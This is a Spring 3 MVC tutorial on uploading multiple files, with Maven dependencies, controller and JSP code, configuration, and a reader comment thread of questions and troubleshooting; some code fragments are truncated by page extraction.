In this simple tutorial we will see how to implement multiple file upload in a Spring 3 MVC based application. The requirement is simple. We have a form which displays file input component. User selects a file and upload it. Also its possible to add more file input components using Add button. Once the files are selected and uploaded, the file names are displayed on success page. 1. Maven Dependencies / Required JAR files If you using Maven in your project for dependency management, you’ll need to add dependencies for Apache Common File upload and Apache Common IO libraries. The spring’s CommonsMultipartResolver class internal uses these library to handle uploaded content. Add following dependencies in your maven based project to add File upload feature. <dependencies> <!-- Spring 3 MVC --> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-webmvc</artifactId> <version>3.1.2.RELEASE</version> </dependency> <!-- Apache Commons file upload --> <dependency> <groupId>commons-fileupload</groupId> <artifactId>commons-fileupload</artifactId> <version>1.2.2</version> </dependency> <!-- Apache Commons IO --> <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-io</artifactId> <version>1.3.2</version> </dependency> <!-- JSTL for c: tag --> <dependency> <groupId>jstl</groupId> <artifactId>jstl</artifactId> <version>1.2</version> </dependency> </dependencies> If you have a simple web application, add following JAR files in WEB-INF/lib folder. You can download all these JARs with source code at the end of this tutorial. 2.. FileUploadForm.java package net.viralpatel.spring3.form; import java.util.List; import org.springframework.web.multipart.MultipartFile; public class FileUploadForm { private List<MultipartFile> files; //Getter and setter methods } 3. Controller – Spring Controller Create a Spring 3 MVC based controller which handles file upload. There are two methods in this controller: displayForm– Is a used to show input form to user. It simply forwards to the page file_upload_form.jsp save– Fetches the form using @ModelAttributeannotation and get the File content from it. It creates a list of filenames of files being uploaded and pass this list to success page. FileUploadController.java package net.viralpatel.spring3.controller; import java.util.ArrayList; import java.util.List; import net.viralpatel.spring3.form.FileUploadForm; import org.springframework.stereotype.Controller; import org.springframework.ui.Model; import org.springframework.web.bind.annotation.ModelAttribute; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RequestMethod; import org.springframework.web.multipart.MultipartFile; @Controller public class FileUploadController { @RequestMapping(value = "/show", method = RequestMethod.GET) public String displayForm() { return "file_upload_form"; } @RequestMapping(value = "/save", method = RequestMethod.POST) public String save( @ModelAttribute("uploadForm") FileUploadForm uploadForm, Model map) { List<MultipartFile> files = uploadForm.getFiles(); List<String> fileNames = new ArrayList<String>(); if(null != files && files.size() > 0) { for (MultipartFile multipartFile : files) { String fileName = multipartFile.getOriginalFilename(); fileNames.add(fileName); //Handle file content - multipartFile.getInputStream() } } map.addAttribute("files", fileNames); return "file_upload_success"; } } 4. View – JSP views Now create the view pages for this application. We will need two JSPs, one to display file upload form and another to show result on successful upload. The file_upload_form.jsp displays a form with file input. Apart from this we have added small jquery snippet onclick of Add button. This will add a new file input component at the end of form. This allows user to upload as many files as they want (subjected to file size limit ofcourse). Note that we have set enctype=”multipart/form-data” attribute of our <form> tag. file_upload_form.jsp <[email protected]</script> <script> $(document).ready(function() { //add more file components if Add is clicked $('#addFile').click(function() { var fileIndex = $('#fileTable tr').children().length - 1; $('#fileTable').append( '<tr><td>'+ ' <input type="file" name="files['+ fileIndex +']" />'+ '</td></tr>'); }); }); </script> </head> <body> <h1>Spring Multiple File Upload example</h1> <form:form <p>Select files to upload. Press Add button to add more file inputs.</p> <input id="addFile" type="button" value="Add File" /> <table id="fileTable"> <tr> <td><input name="files[0]" type="file" /></td> </tr> <tr> <td><input name="files[1]" type="file" /></td> </tr> </table> <br/><input type="submit" value="Upload" /> </form:form> </body> </html> Note that we defined the file input name as files[0], files[1] etc. This will map the submitted files to the List I would suggest you to go through this tutorial to understand how Spring maps multiple entries from form to bean: Multiple Row Form Submit using List of Beans Second view page is to display filename of uploaded file. It simply loops through filename list and display the names. file_upload_success.jsp <[email protected] <li>${file}</li> </c:forEach> </ol> </body> </html> 5. Spring Configuration In Spring configuration (spring-servlet.xml) we define several important configurations. Note how we defined bean multipartResolver. This will make sure Spring handles the file upload correctly using CommonsMultipartResolver class. spring-servlet.xml <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="" xmlns: <context:annotation-config /> <context:component-scan <bean id="multipartResolver" class="org.springframework.web.multipart.commons.CommonsMultipart> 6. Output Execute the project in Eclipse. Open following URL in browser to see file upload form. URL: Select files through file dialog and press Upload button to upload. Following page will displayed with list of files being uploaded. We have added a small Javascript snippet for Add button. This will add more file upload components to the page. Use this if you want to upload more files. Download Source Code SpringMVC_Multi_File_Upload_example.zip (3.6 MB) Hi Viral! A great tutorial! How do we restrict the file types being uploaded. Use case being i want the user to upload only .pdf file or .xls files. You can use a validator, first register your validator Then you apply that validator to uploaded file I hope this helps Hi Creg, In your reply said : First register your validator, then apply, can you please show us where to register and where to apply, and where to create the validator, do we need a configuration somewhere ? Thanks Hello there, nice tutorial. Just one warn, when I run your example after download it from here and I get the following exception stacktrace: You shoul change the line of code: for this one: doing so, it wont duplicate the same last index when select the “Add File” button Regards! Very good tutorial, thanks. this is very good to learn java, keep exist with this site such we can to be java expert hahahahaha., thanks viralpatel., Thanks for this example. Its easy to understand, I have downloaded the source code, but i am not able to run the project. i am getting 404 error. what is missing?. Spring Multiple File Upload example Following files are uploaded successfully. CreateDB.sql Where is place uploaded files ? I want to using ajax(not submit form), read the selected file in input file. You can help me… Hi, I need to send a similar form but using AJAX. Any solution? Thanks a lot! hai all can you help me now? For some of my homework (one of many problems) “how to uploading file xls with asp mvc 3 to database? ” share with me please, simple sample programming ASP MVC3 Database SQL SERVER example databases name_DB = db_school, name_table = tbl_student, Field = – id, name Thanks for detailed explanation. Before visiting to this page I didn’t knew anything about file upload, Now i can write file upload code easily.. Regards sid I was not sure where the files were uploaded… So,I just got your code a little modified with d help of some other example: And here is the full running code: 1.Just Create D:\Test\Upload directory structure or whatever. 2.Copy this code to FileUploadController.java when I copied your updated controller, the file is getting uploaded into the location. But, I’m getting this error. Please clarify. java.io.IOException: Destination file [C:\Temp\Upload] already exists and could not be deleted org.springframework.web.multipart.commons.CommonsMultipartFile.transferTo(CommonsMultipartFile.java:130) I got the solution for the above exception. I just added a condition like this and added the files in the last step. Please see the code below: Hi Sathya, How to get a path and path will store mysqldatabase with the help of hibernate.please send me a [email protected] thankyou soo muucch for ur valuable and timesaving concept :) Thanks much Sathya :) This was helpful :) cool machi…yenga tale viral-kku oru ooooooo podu… Hi viral could you please rectify this following exception This really helped me. Struggled lot of time to get this done before seeing this tutorial/topic Thankyou. very nice tutorial for beginners. Really a great tutorial. I am getting file name as null in controller. here is my controller code. Please help me Check if you have added in spring-servlet.xml Hi, Thanks for sharing. Nice one . Hi, dynamically added file type not working. when I click on add file and upload three files then also I get only default two file. Dynamically added file object are not available in controller. Please help..!!. I am getting the java.io.IOException: Destination file [C:\TEMP] already exists and could not be deleted. However the file is getting uploaded and updated. Please see my code below : i want to show the image after upload image so can u help me to get that code in .jsp and also controller? Hi viral, Really this examples helps me a lot, But plz do one help for me, plz develop a applicaiton to select two files from browser ( txt1, txt2) and display it on to the browser and while clicking on save button it will ask the location on harddisk to save the files. And plz send me these application on to the my id – [email protected] and if possible then give me ur number also into my id. Thanking you ========== Devesh Anand How many changes are require to convert this to Ajax based file upload? I have repository class where I want to store the image that is coming from MultipartFile to webapp/resources/images directory before adding the product details to the repository ? my repository class is ResourceLoaderAware. I am getting fileNotFoundException, “imagesDesert.jpg” is the image I am trying to upload Hi Viral, Do you have any idea for sending Email with multiple attachments???? actually i refereed bellow link its working fine for single attachment…. please if u have any idea share us… Thank you hey i want to remove attach files… plz give me code as early as possible. function confirmation() { alert(“Please check your mail and attachment”); } $(document).ready(function() { //add more file components if Add is clicked $(‘#addFile’).click(function() { var fileIndex = $(‘#fileTable tr’).children().length; if(fileIndex==0){ fileIndex=fileIndex; } else if(fileIndex==2){ fileIndex=fileIndex-1; } else{ var i=fileIndex/2-1; fileIndex=i+1; } $(‘#fileTable’).append( ‘ ‘); }); $(‘#delfile’).live(‘click’, function() { $(this).parent().parent().html(“”); return false; }); }); java code———————— thank you….. Getting this error when i try to execute this code java.lang.IllegalArgumentException: Document base C:\Documents and Settings\temp\My Documents\NetBeansProjects\WebRatan\build\web does not exist or is not a readable directory viralupload FileUploadController FileUploadController com.FileUploadController FileUploadController /FileUploadController spring org.springframework.web.servlet.DispatcherServlet 1 contextConfigLocation /WEB-INF/spring-servlet.xml org.springframework.web.context.ContextLoaderListener spring *.html index.html index.htm index.jsp default.html default.htm default.jsp Hi viral, I have learnt so many things from ur blog…. Can you help me out for doing file uploading using angularjs and spring?? hey, viralpatel! I was wondering how one can store and retrieve an image (or a list of images) to and from a database, say, mysql. I’m really struggling with this for days now. Thank you! I followed Your code i want to save the file in data base can you specify the code in controller method like dao.save(); And what to write in the Dao class hi i got this error..please give me solution type Exception report message An exception occurred processing JSP page /index.jsp at line 1 description The server encountered an internal error that prevented it from fulfilling this request. exception org.apache.jasper.JasperException: An exception occurred processing JSP page /index.jsp at line 1 1: How can i see the uploaded files can you please help me .. Hi am getting null value in @ModelAttribute(“uploadForm”) FileUploadForm uploadForm
http://viralpatel.net/blogs/spring-mvc-multiple-file-upload-example/
CC-MAIN-2016-22
refinedweb
2,032
51.14
Service Bus Routers And Queues .Net Services March 2009 CTP As Infoq has previously reported, Microsoft has recently released a new CTP of Azure services platform which. A centerpiece of Azura .Net Services is the Services Bus which: ... provides the familiar Enterprise Service Bus application pattern, while helping to solve some of the hard issues that arise when implementing this pattern across network, security, and organizational boundaries, at Internet-scale According to Clemens Vasters, the most significant change in the March 2009 CTP is the addition of service bus routers and queues.: .... The implementation of Service service bus routers and queues is facilitated through a change in service bus namespace:. Clemens Vasters explains, that: The relationship between any messaging primitive and the Service Bus namespace is established by picking a name in your project’s Service Bus hierarchy... and then assign a role to that name... all names in a Service Bus namespace that can theoretically exist do already exist and their role is ‘none’. So when I’m assigning a role to a name, I don’t create the name itself. The name is already there, it’s just in hiding...". He defines routers and queues: these capabilities "primitives", because they explicitly allow for composition. The capabilities of the Queue are defined by Queue policies which are somewhat similar to the policies of typical JMS queues and can be accessed and managed, using both WS* and Rest APIs. Microsoft's views .NET Service Bus as an implementation of the ESB pattern, which has grown in popularity over the years because it simplifies the management of multiple service connections. One way it does this is by enabling publish/subscribe architectures, which provides for even looser-coupling throughout an enterprise. The introduction of the queuing support through Service Bus Routers And Queues in .Net Services March 2009 CTP, brings this vision one step closer to reality. Hello stranger!You need to Register an InfoQ account or Login or login to post comments. But there's so much more behind being registered. Get the most out of the InfoQ experience. Tell us what you think
http://www.infoq.com/news/2009/04/NetServices
CC-MAIN-2015-40
refinedweb
353
54.93
Raible Designs <a href="">Matt Raible</a> is a UI Architect specializing in open source web frameworks. <a href="">Contact me</a> for rates. 2009-07-15T22:39:28-06:00 Apache Roller (incubating) This is an XML content feed. It is intended to be viewed in a newsreader or syndicated to another site, subject to copyright and fair use. Raible Road Trip #13 Trip Report Matt Raible 2009-07-05T13:30:17-06:00 2009-07-05T13:41:20-06:00 <a href="" title="Mount Rushmore" rel="lightbox[rushmore]"><img src="" width="100" height="75" alt="Mount Rushmore" class="picture" /></a> Last Monday morning, my Dad, Abbie, Jack and I loaded up our rig and embarked upon <a href="">Raible Road Trip #13</a>. We rolled through Custer, South Dakota around 4:30 in the afternoon and arrived at <a href="">Mount Rushmore</a> just after 5. After gawking at Rushmore, we took a meandering route through 1-car tunnels and <a href="">Custer State Park</a>. We saw a plethora of bison, some antelope and lots of nice campsites. </p> <p style="text-align: center"> <a href="" title="Buffalo in Custer State Park" rel="lightbox[rushmore]"><img src="" width="100" height="75" alt="Buffalo in Custer State Park" style="border: 1px solid black; margin-left: 10px" /></a> <a href="" title="Antelope in Custer State Park" rel="lightbox[rushmore]"><img src="" width="100" height="75" alt="Antelope in Custer State Park" style="border: 1px solid black; margin-left: 10px" /></a> <a href="" title="Campsite near Custer" rel="lightbox[rushmore]"><img src="" width="100" height="75" alt="Campsite near Custer" style="border: 1px solid black; margin-left: 10px"/></a> </p> <p>On Tuesday, we woke up early and began the 9-hour drive to Fairmont Hot Springs. We pulled in right around 5 and had a blast in the pool and on the water slide. When we got there, we discovered that the pools were open 24 hours. Abbie and I were still up when my Dad and Jack fell asleep, so we snuck out and played in the pool by the fading light of the 10:00 sunset.</p> <p style="text-align: center"> <a href="" title="Fairmont Playground" rel="lightbox[rushmore]"><img src="" width="100" height="75" alt="Fairmont Playground" style="border: 1px solid black" /></a> <a href="" title="Kids loved the slide" rel="lightbox[rushmore]"><img src="" width="100" height="75" alt="Kids loved the slide" style="border: 1px solid black; margin-left: 10px"/></a> </p> <p>On Wednesday, we arrived at The Cabin around 5 after a brief stop in Missoula to get some clown costumes (for the parade) and have some of the <a href="">best ice cream in the world</a> (according to Jack). Abbie learned how to chop wood and Jack got to ride on all the tractors. My Mom arrived from Oregon later that night. </p> <p style="text-align: center"> <a href="" title="Ha yah" rel="lightbox[rushmore]"><img src="" width="100" height="75" alt="Ha yah!" style="border: 1px solid black" /></a> <a href="" rel="lightbox[rushmore]" title="Learned how to chop wood for the first time"><img src="" width="100" height="75" alt="Learned how to chop wood for the first time" style="border: 1px solid black; margin-left: 10px"/></a> <a href="" title="Driving the Ford" rel="lightbox[rushmore]"><img src="" width="100" height="75" alt="Driving the Ford" style="border: 1px solid black; margin-left: 10px"/></a> </p> <p>Thursday and Friday, we worked on The New Cabin and got ready for the Swan Valley 4th of July Parade. While camping in Custer, Abbie and I decided to be clowns for the parade and we were fortunate enough to find costumes in Missoula. My Mom had to drastically shrink Abbie's to fit, but her hard work paid off when Abbie won 1st Place among all the walkers. She was sooo cute as a little clown and I was a proud Dad for pulling off another fun parade. </p> <p style="text-align: center"> <a href="" title="Abbie the Clown" rel="lightbox[rushmore]"><img src="" width="240" height="180" alt="Abbie the Clown" style="border: 1px solid black" /></a> <a href="" title="Clown Family" rel="lightbox[rushmore]"><img src="" width="240" height="180" alt="Clown Family" style="border: 1px solid black; margin-left: 10px" /></a> </p> <p>After the parade, we ate some huckleberry ice cream and watched the O-Mok-See for a couple hours. Then we joined up with my friend Owen and his family and enjoyed an afternoon boating on Holland Lake. We closed the night watching fireworks and got to bed really late. </p> <p> Since we've been here, we've seen a couple bears (while riding the 4-wheeler with each kid) and my Mom saw a mountain lion walk in front of the cabin this morning. The mosquitos are vicious, but the weather is beautiful. For more pictures from the last week, see my <a href="">Montana 2009 - Week 1</a> set on Flickr."> ." <span style="text-align: right; color: #666; display: block"> <em><a href="" title="View David's Profile">David Thomas</a>, VP of Technology, Evite</em> </span> </p> <p class="quote" style="color: #666"> ." "> > </pre> </li> <li>Modify your dependencies to match the ones below. With the Codehaus plugin, dependencies are much more concise. <pre class="brush: xml"> > <>. JSON Parsing with JavaScript Overlay Types in GWT Matt Raible 2009-06-24T09:52:49-06:00 2009-06-24T10:00:52-06:00 A reader recently <a href="">asked</a>:</p> <p style="color: #666" class="quote">.<">(); }-*/; } </pre> <p>This class alone allows you to easily parse JSON returned in a callback. For example, here's an example of parsing <a href="">Twitter's User Timeline</a> in my <a href="">OAuth with GWT</a> application. </p> <pre class="brush: java">>To simply things even more, we created a BaseModel class that can be extended.</p> <pre class="brush: java">); } } <>.</p> <p style="text-align: center"> <a href="" title="The Great Sand Dunes"><img src="" width="500" height="375" alt="The Great Sand Dunes" style="border: 1px solid black" /></a> </p> <p <a href="">flight is delayed</a>.. <">("<meta http-equiv=\"refresh\"")) { String";()); }< <em>send()</em> method as well as utility methods to get the cookie values of the oauth tokens.</p> <pre class="brush: java">); } }</pre> <p>If all goes well, the response contains the data you requested and it's used to populate a textarea (at least in this demo application). Of course, additional processing needs to occur to parse/format this data into something useful.</p> <p>This all sounds pretty useful for GWT applications, right? I believe it does - but only if it works consistently. I sent <a href="">a message</a> to the OAuth Google Group explaining the issues I've had. </p> <p class="quote" style="color: #666">? </p> <p>I received a <a href="">response</a> with a cleaner <em>makeSignedRequest()</em>. </p> <p>To make it easier to create a robust example of GWT and OAuth, I created a gwt-oauth project you can <a href="">download</a> or <a href="">view online</a>..>.. </p> <p. </p> >My two favorite parts of the trip were 1) the people and 2) the place. There was around 15 of us, many of which have been good friends since college. We stayed at the Paraiso Maya, which was a very nice hotel with beautiful pools, elaborate buffets and awesome beach access. We had a ton of fun at the pool bar, playing water basketball, jet skiing and playing beach volleyball. The dinners at the Steakhouses were great and The Galaxy (Star War themed) club created many good memories. It's great to travel with that many people, especially when the beer is flowing for (what seems like) free and you're partying with old friends. <> <em>without</em> GXT. After a day, we had an application with *.cache.html files of 133K. Yes, that's over a 50% reduction in size!<a href="">*</a></p> <p>. <> Today is a very special day in my Dad's life. Today is his last day of work. Within the next hour, Joseph Edward Raible, Jr. will officially become retired and subsequently one of the happiest people I know. My dad has always had an interesting relationship with <em>work</em>. I've never met someone who hated working for <em>The Man</em> more, yet had such a strong work ethic.</p> <p>Growing up in Montana, my dad always had the shittiest jobs. When I was a toddler, he used to walk several miles to work, often during the cruel Montana winters. As I got older, I remember him working as a carpenter, logger, trail crew specialist, firefighter, radio technician and even a programmer. The reason his jobs were so shitty is because he told us they were. I don't think he made over $5/hour until I was in the second grade.<> as a Network Administrator. After 6 months, they hired him and he quickly moved up the ranks. I believe his current title is something fancy like Director of Wireless Communications. Over the last 19 years, he's worked for the BLM and done amazing things like setup radio networks in Honduras and Tanzania. He's turned into quite the world traveler. </p> <p>The thing I remember the most is his perseverance. One winter when he couldn't find work, he <a href="">built a barn</a>. From scratch, mostly by himself.</p> <p>The other thing I remember well is how much he complained about work. It was never the actual work that he complained about, it was the "stupid fuckin' idiots" that he had to work with (or for). This is the reason that this is such a special day. I can't help but think a huge weight is being lifted from his shoulders and he's going to much happier. Then again, you know how these things go - he might actually miss having people around to complain about.</p> <p>One thing's for sure, I'm super pumped and happy for the guy. He plans on moving back to Montana for the summer to work on the New Cabin and it's likely I'll get to spend a lot more time with him in the coming years.<" /><. <img src="" class="smiley" alt=":-D" title=":-D" /> Optimizing a GWT Application with Multiple EntryPoints Matt Raible 2009-03-25T16:00:37-06:00 2009-03-25T16:00:52-06:00. </p> <p <em>release early, release often</em> with GWT, chances are you'll just want to release one feature at a time. </p> <p.<= </pre> <p>To enable history support in this application, I implemented <a href="">HistoryListener</a> in my EntryPoint (Application.java) and added the following logic to initialize: </p> <pre class="brush: java"> //(); </pre> <p>In this example, HistoryTokens is a class that contains all the URLs of the "views" in the application.</p> <pre class="brush: java"> public class HistoryTokens { public static final String>Next week, I'm helping to polish and document our entire release process (from dev → qa → production). If you have any advice on how to best perform releases with Maven, Grails and/or Nexus, I'd love to hear about it. My goal is extreme efficiency so releases can be done very quickly and with minimal effort.">. <br/><br/>. </>. <br/><br/>. <br/>. <br/><br/>. <br/><br/>. > I'm writing up a blog post on how to setup a Software Development Company for consultants and wanted to see what retirement plan I have. I'd like to recommend it (or others, if there's better deals). Do you have the name and a 2-3 sentence description? </em> </p> <p>Below is his response:</p> <p class="quote" style="color: #666"> You have a SEP IRA but depending on how much they make and their savings objective they may also want an Individual 401K and/or Defined Benefit Plan. <br/><br/> A SEP IRA allows you to set aside up to 20% of your income after business expenses, up to $49,000 for those with income of $245,000 or more in 2009. An Individual 401K allows you to save a higher percentage of your income depending on your age and income. If you are under age 50 you are able to save $16,500 so long as your income is at least $16,500 (plus FICA, etc) and $22,000 for those over age 55. You are also able to set aside profit sharing and matching contributions in a 401K Plan. Those under age 50 have a maximum of $49,000 while those over age 50 have an increased limit of $54,000. Finally, for those who wish to save more, you could establish a Defined Benefit Plan and make contributions based on your age and income that total potentially more than $200,000 per year. If you establish a Defined Benefit Plan you are still able to have an Individual 401K Plan but the limits are the employee contribution amount ($16,500 or $22,000) plus 6% of your income up to $245,000 (another $14,700) for a combined total that could be well over $200,000 depending on your age and income. <br/><br/> There is always the Roth and Traditional IRA but those are very basic planning tools - they should still be used and considered but everyone should be familiar with them. 2009 allows $5,000 deposit for under age 50 and $6,000 for over age 50. Roth contributions are limited starting at $105,000 if filing single and $166,000 if married filing joint. </p> <p> <p>Of course, a perk of working for a company with benefits is they sometimes do 401K matching. However, I'd expect many company to be cutting back on that in this economy. If you're an independent consultant, do you have a retirement plan? Do you think you're doing as well as you could if you were a full-time employee?. </p> <p> First of all, I believe that contracting is better in this economy for a very simple reason:</p> </p> <p style="margin-left: 20px"><strong>When you're a contractor, you're prepared to be let go.</strong></p> .</p> <p.</p> <p><em>Being a contractor forces you to better yourself so you're more marketable.</em></p> <p. </p> <p. </p> <p>So you've decided to take my advice and try your hand at contracting. Should you setup your own Corporation or LLC? </p> <p><strong>Starting a Company</strong><br/>.</p> <p. </p> <p. <. </p> <strong>Update:</strong>./> The future of the web may be as ubiquitous as electricity. Chris has a desktop, two laptops (one 10" NetBook, one is a 13" MacBook) and an iPhone. There's a lot of difference between these devices, especially when it comes to screen size. Chris uses a number of different browsers throughout the day. The web isn't just one browser, it isn't just one platform. He's showing a slide with a browser market share graph from <a href=""></a>. </p> <p>Many different browsers are a reality. Many different devices are a reality. Web builders need to learn to write scalable applications that run across multiple browsers, devices and environments. They need to use progressive functionality and learn the tools they have in CSS and HTML. Semantic structuring helps. <>Opera Mini does its processing on the server-side. This allows Opera to gather statistics. These stats show that users around the world hit the same top sites on their mobile devices as they do on their desktops. It's a one-to-one match. Opera is seeing tremendous growth in the usage of Opera Mini, both in developed countries and emerging markets. </> The web is kinda important these days. It's a big deal. Make a mistake and 300 million dollars go away (see end of last entry about United news). One of the beauties of the web is you can easily participate as an individual. You can report bugs, write articles and be a part of many web standards groups. Most of the other systems in the world don't provide this kind of access. </p> <p>Dan has been under a rock for the last 5 years working on Semantic Web stuff. Now that he's back in the game, it's incredible how much stuff is going on. He's glad there's JavaScript frameworks so he doesn't have to learn everything. The default security policies in browsers are a little rickety at this point. They allow you to download and run JavaScript from virtually any site. <a href="">Caja</a> might help to solve this. Dan believes that security will become more important and stricter to protect web users. </p> <p><strong>Scott Fegette</strong><br/> Scott is a Product Manager in the Web Group of Adobe. At the beginning of each year, they do heavy user research. Adobe wants people that develop content for the web to be as expressive as possible. Scott is going to give us a peak into the conversations he's had with the web community. </p> <p>One of the biggest topics on people's minds is The Economy, but it's not negative as you might think. Small web designers are actually getting more business in the downturn, likely because companies are polishing their presence on the web. People are working much more distributed these days. There's a few areas that Adobe generally asks about: CSS, JavaScript, HTML (both statically and dynamically). </p> <p>Frameworks are becoming more important to developers, as well as with clients. They've even seen some clients demand certain frameworks. Two years ago, when Adobe talked to small design shops and agencies, most web sites were built statically. Now they're developing with frameworks like WordPress. Out of 60 folks they talked to, only 2 were using static systems and not CMS>The other big investments for Adobe is RIAs and AIR. Ajax has matured enough that it can now compete with proprietary plugins like Flash. The reason for AIR is to allow web developers to use their skills to develop desktop applications. Flash and Flex are often overkill for browser-based applications, but they do often handle video and audio better than Ajax applications. </p> <p><strong>Mike (TM) Smith</strong><br/> Mike is also known as the "W3C HTML jackass". Mike thinks the state of the web is that it's a mess in a lot of ways. If you don't believe him, ask Doug Crockford. Most of this stuff is going to remain a mess for the next 20 years, unless another genius like Tim Berners-Lee comes along and invents something new. However, the good part about it being a mess is that we all have jobs. </p> <p> One of the biggest things they're trying to do with HTML 5 is not breaking backward compatibility. Other working groups at the W3C don't share this philosophy, hence the reason they don't have browser vendors participating. Many of the ideas for HTML 5 game from Gears and Ajax Framework developers like <a href="">John Resig</a>. All this will make things less messy, especially with the help of browser vendors. </p> <p>Developers like the ubiquitous web and are pushing the mobile web. Mike thinks everyone just needs to get a life (big applause). For mobile, SVG has already been a big success. You will see significant great things with SVN happen in major browsers by next fall. If you're a web developer, you should spend some time experiment with SVG. It will payoff for you. If it doesn't pay off for you and you see Mike next year at Web Directions North, you can punch him in the face. </p> <p>Location-aware applications will be big as well. Browser vendors are implementing the Geo Location API. It's implemented in Opera, Firefox, WebKit and Gears. Video on the web will be significant as well. The SVG working group pioneered video support into standards, before HTML 5. Many of the problems they face are related to video codecs. The only way to solve the problems with video on the web is with money and lawyers. Very specifically, there's no royalty-free codec for video. This is nothing that standards bodies can solve. The most promising is that Sun Microsystems is developing an open codec and spending money to make sure they're not infringing on patents. <> After each panelist talked, John asked them questions about what's the biggest thing they'd like to see implemented by everyone (open video codec, geo location api were the winners). Mike also did some complaining about XML and how broken it is because there's no failure mechanism. There was some audience banter with Chris about SVG in IE. </p> <p><strong>Conclusion</strong><br/> This was a very interesting session, especially to hear from the people who are building/supporting the future of the web. I liked Scott's talk on what Adobe's hearing from their users. I also liked hearing Mike (TM)'s opinionated thoughts on XML and his non-marketing approach to most everything related to the web. Lars from Opera had a marketing-ish presentation, but it was nevertheless interesting to hear what Opera's working on. Good stuff..</p> ). <>.</p> <p.</p> <p> <a href="" title="After the run home" rel="lightbox[commutejan2009]"><img src="" width="100" height="75" alt="After the run home" class="picture"/></a>. <>My mom is a Montana Native who wasn't afraid to raise her kids in the backwoods at her family's homestead. It sounds like a crazy idea to me, but she made it happen - cooking over a wood stove every day and working at the Swan Valley Ranger Station to make ends meet. She was responsible for getting us out of Montana and onto Oregon. She went back to school in her early 40s, got a degree in Forestry from the University of Montana and moved the whole family to Oregon for a job with the BLM.<> As much fun as I've had, I'm looking forward to getting back to Denver and hanging out with my kids. January 2009 is sure to be one for the books. I start a new gig at a new office tomorrow. On Wednesday, the kids return from Florida to a mountain of presents at my house. My parents are coming to town next weekend, followed by a trip to Tahoe and a weekend in Steamboat to finish out the month. <.
http://feeds.feedburner.com/rd.cfm%3Fsite=http://www.sqlmag.com/articles/index.cfm%3Farticleid=97373
crawl-002
refinedweb
3,822
71.14
NAME fcntl - manipulate file descriptor SYNOPSIS #include <unistd.h> #include <fcntl.h> int fcntl(int fd, int cmd, ... /* arg */ ); DESCRIPTION fc. descriptor. Specifying this flag permits a program to avoid an additional fcntl() F_SETFD operation to set the FD_CLOEXEC flag. For an explanation of why this flag is useful, see the description of O_CLOEXEC in open(2). File descriptor flags. F_GETFD (void) Read the file descriptor flags; arg is ignored. F_SETFD (long) Set the file descriptor flags to the value specified by arg. File status flags Each) Read the file status flags; arg is ignored. F_SETFL (long) only change the O_APPEND, O_ASYNC, O_DIRECT, O_NOATIME, and O_NONBLOCK flags. Advisory locking.)). (long) F_SETLEASE and F_GETLEASE (Linux 2.4 onwards) (long) only be placed). File and directory change notification (dnotify) F_NOTIFY (long) ,.; see signal(7).. A dup2(2), flock(2), open(2), socket(2), lockf(3), capabilities(7), feature_test_macros(7) See also Documentation/locks.txt, Documentation/mandatory.txt, and Documentation/dnotify.txt in the kernel source. COLOPHON This page is part of release 3.15 of the Linux man-pages project. A description of the project, and information about reporting bugs, can be found at.
http://manpages.ubuntu.com/manpages/jaunty/man2/fcntl64.2.html
CC-MAIN-2014-41
refinedweb
192
54.29
CodePlexProject Hosting for Open Source Software Anyone tried having multiple widget zones?? since they all share the same datastore, they all end up looking the same. Im working on a way to store the widget data under the ID of the WidgetZone. Therefore its possible to have multiple widgetzones all configured differently... You may be wondering why i need this, well i wanted a way to show a single widget on a page (eg a link editor on a links.aspx). Rather than creating a new control, i figures i could just host a single link editor widget on the page... not possible with standard code as all widgetzones share the same setting... have i misses something or is my modification the only way to show widgets with different settings?? Cheers Multiple widgetzone support was added to BE in changeset 1.5.1.0 on April 18th. The latest build can be downloaded on the Source Code tab above. With the new multiple widgetzone capability, you can specify a "ZoneName" for each widget zone. Each zone contains its own separate data. Here's a blog post describing the new capability. That sounds exactly like what ive just implemented!! glad to see im not the only one needing this feature... Joe I have tried to upgrade from BE 1.5.0.7 to BE 1.5.1.11 with blogengine-27919.zip, as I want to implement Multiple Widget Zones. Perhaps I am doing something wrong. The build says something like ‘BlogRollItem cannot be found in namespace Blogengine.Core’ (is there a missing reference to an assembly?) Can anybody help – I am quite new here. Thanks! Poul If you download any of the builds from the Source Code tab, it's required to build/compile the BlogEngine core project. When that project is built, you'll have a new BlogEngine.Core.dll file that you will put into your BIN folder. The BE core project can be built using the free Visual Web Developer 2008 Express Edition (if you don't already have Visual Studio installed on your computer). Thanks a lot Ben – it really works fine now. I thought in my naivety that it already was done by you the contributor of the ZIP file, and that the content of the bin folder was missing. Thanks again! Poul I would like to use the multiple widget zone and all other updates included in the current BlogEngine ver 1.5.1.11 or higher source code. Hence the first person - and only one person - (must be a registered developer of codeplex - blogengine.net ) who sends to me a built/complied version of blogengine core project will receive $ 50 via paypal. My email is yasir@simdi.com Are you sure you want to delete this post? You will not be able to recover it later. Are you sure you want to delete this thread? You will not be able to recover it later.
http://blogengine.codeplex.com/discussions/59684
CC-MAIN-2017-30
refinedweb
491
76.32
So I was coding along working on another dll, I recompiled a dll containing the following code and suddenly my program was crashing, when i clicked the show info link on the 'send this report to Microsoft' dialog box, it said the dll which was throwing the error was msvcp90d.dll, I tracked it down to the log function (debigger said it couldn't be evaluated) : #include "log.h" (includes <iostream>, <fstream>, <string> and has the log structure) RupLogger::RupLogger() { logfile.open("log.txt", ios::out); } RupLogger::~RupLogger() { logfile.close(); } void RupLogger::log(string msg) { logfile << msg + " \n"; } So I decided to try something, the logger started below is logged correctly, but log still crashes. RupLogger::RupLogger() { logfile.open("log.txt", ios::out); logfile << "[SYS] Logger Started \n"; } So I thought there might be some strange issue with the logfile object's access or something so I tried below: void RupLogger::log(string msg) { this->logfile << "[SYS] Test Log \n"; this->logfile << msg + " \n"; } Now this is where it gets freaky, now the debugger jumps into the ostream header and says the following is not evaluating (in bold): Line 746: streamsize _Pad = [B]_Ostr.width()[/B] <= 0 || [B]_Ostr.width()[/B] <= _Count ? 0 : [B]_Ostr.width()[/B] - _Count; And um well now I'm just confused >.< and would like my program to run correctly again...
https://www.daniweb.com/programming/software-development/threads/199930/heres-a-hard-one-ostream-include-msvcp90d-dll-not-working
CC-MAIN-2017-34
refinedweb
225
58.21
